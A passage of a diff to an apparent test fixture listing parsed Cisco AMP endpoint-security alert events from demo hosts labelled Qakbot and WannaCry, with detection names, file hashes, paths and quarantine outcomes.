"test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 218000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412662850426241000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "file.name": "kepv86368.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\kepv86368.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 71990, + "related.hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:10:30.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.D177E09A9A-95.SBX.TG", + "cisco.amp.detection_id": "6412662850426241033", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 218000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412662850426241000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "file.name": "uqlq0o884.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\uqlq0o884.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 73246, + "related.hash": [ + "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T18:03:55.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419281601187807332", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 891000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419281601187807000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 74502, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T18:03:55.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.24D004A104-95.SBX.TG", + "cisco.amp.detection_id": "6419281601187807332", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 891000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419281601187807000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "\\\\?\\C:\\WINDOWS\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 75695, + "process.hash.md5": "4e568dbe3fff1a0025eb432dc929b78f", + "process.hash.sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf", + "process.hash.sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71", + "process.name": "lsass.exe", + "process.pid": 708, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T18:03:52.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419281588302905443", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 396000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419281588302905000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", + "file.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "\\\\?\\C:\\Windows\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 77209, + "process.hash.md5": "4e568dbe3fff1a0025eb432dc929b78f", + "process.hash.sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf", + "process.hash.sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71", + "process.name": "lsass.exe", + "process.pid": 708, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "db349b97c37d22f5ea1d1841e3c89eb4", + "e889544aff85ffaf8b0d0da705105dee7c97fe26" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T18:03:52.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419281588302905443", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 927000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419281588302905000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 78808, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:51:19.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6411538569722068995", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 495000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411538569722069000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "input.type": "log", + "log.offset": 79928, + "related.hash": [ + "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:51:19.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6411538569722068994", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 495000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411538569722069000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "input.type": "log", + "log.offset": 81129, + "related.hash": [ + "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:51:19.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6411538569722068993", + "cisco.amp.event_type_id": 553648155, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 495000000, + "event.action": "Retrospective Quarantine", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411538569722069000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "input.type": "log", + "log.offset": 82330, + "related.hash": [ + "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:51:19.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "Auto.BAC7BC5281.in10.tht.Talos", + "cisco.amp.detection_id": "6411538569722068995", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 495000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411538569722069000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", + "file.name": "igvj$vN.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\Documents\\igvj$vN.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 83443, + "related.hash": [ + "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:51:19.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "Auto.BAC7BC5281.in10.tht.Talos", + "cisco.amp.detection_id": "6411538569722068994", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 495000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411538569722069000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", + "file.name": "6951045.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\6951045.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 84690, + "related.hash": [ + "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:51:19.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "Auto.BAC7BC5281.in10.tht.Talos", + "cisco.amp.detection_id": "6411538569722068993", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 495000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411538569722069000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.md5": "dc41e47ebba549ec5e616ed9e88a0376", + "file.hash.sha1": "99fffe78e0cbd7b508eed13a8633903dd89ed5f1", + "file.hash.sha256": "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", + "file.name": "MspthrdHash.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 85948, + "related.hash": [ + "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", + "dc41e47ebba549ec5e616ed9e88a0376", + "99fffe78e0cbd7b508eed13a8633903dd89ed5f1" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275399255031906", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 812000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275399255032000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 87312, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275399255031905", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 297000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275399255032000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 88505, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275399255031904", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 297000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275399255032000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 89691, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], - "cisco.amp.timestamp_nanoseconds": 233000000, - "event.action": "Retrospective Quarantine Attempt Failed", + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275394960064606", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 297000000, + "event.action": "Quarantine Failure", "event.category": [ "malware" ], "event.dataset": "cisco.amp", - "event.id": 6412662850426241000, + "event.id": 6419275399255032000, "event.kind": "alert", "event.module": "cisco", - "event.severity": 3, - "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", "fileset.name": "amp", - "host.hostname": "Demo_Qakbot_3", - "host.name": "Demo_Qakbot_3", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 67131, + "log.offset": 90884, "related.hash": [ - "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "related.hosts": [ - "Demo_Qakbot_3" + "Demo_WannaCry_Ransomware" ], "related.ip": [ "8.8.8.8", @@ -2013,49 +4290,214 @@ ] }, { - "@timestamp": "2021-01-14T19:10:30.000Z", + "@timestamp": "2021-01-14T17:39:51.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "02:2f:e0:10:03:5d" + "mac": "53:74:31:cb:37:50" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection_id": "6412662850426241034", - "cisco.amp.error.description": "Object name not found", - "cisco.amp.error.error_code": 3221225524, - "cisco.amp.event_type_id": 2164260893, + "cisco.amp.detection_id": "6419275394960064605", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "02:2f:e0:10:03:5d" + "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 218000000, - "event.action": "Retrospective Quarantine Attempt Failed", + "cisco.amp.timestamp_nanoseconds": 281000000, + "event.action": "Quarantine Failure", "event.category": [ "malware" ], "event.dataset": "cisco.amp", - "event.id": 6412662850426241000, + "event.id": 6419275399255032000, "event.kind": "alert", "event.module": "cisco", - "event.severity": 3, - "file.hash.sha256": "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", "fileset.name": "amp", - "host.hostname": "Demo_Qakbot_3", - "host.name": "Demo_Qakbot_3", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 68332, + "log.offset": 92070, "related.hash": [ - "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275394960064607", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 281000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275399255032000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": 